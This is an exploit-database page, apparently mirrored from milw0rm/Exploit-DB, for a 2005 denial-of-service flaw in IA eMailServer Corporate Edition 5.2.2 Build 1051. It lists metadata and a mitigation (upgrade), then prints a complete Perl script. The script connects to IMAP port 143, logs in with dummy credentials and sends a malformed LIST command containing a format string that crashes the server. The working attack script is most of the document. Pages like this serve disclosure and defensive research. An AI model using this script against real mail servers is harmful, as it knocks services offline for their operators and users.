header-logo
Suggest Exploit
vendor:
IA eMailServer Corporate Edition
by:
milw0rm.com
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: IA eMailServer Corporate Edition
Affected Version From: 5.2.2. Build: 1051
Affected Version To: 5.2.2. Build: 1051
Patch Exists: YES
Related CWE: N/A
CPE: a:tnsoft:ia_email_server_corporate_edition
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

IAeMailServer_DOS.pl

This exploit is used to crash the IA eMailServer Corporate Edition Version 5.2.2. Build: 1051. It sends a malformed LIST command to the server which causes it to crash.

Mitigation:

Upgrade to the latest version of IA eMailServer Corporate Edition.
Source

Exploit-DB raw data:

#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl <ip>
#        IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# http://www.tnsoft.com/
#
############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
        print "Attempting to kill IA eMailServer at $ARGV[0]:143...";

        sleep(1);

        print $socket "0000 LOGIN hello moto\r\n";

        sleep(1);

        print $socket "0001 LIST 1 \%x\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:143\n";
}
#===== End IAeMailServer_DOS.pl =====

# milw0rm.com [2005-06-26]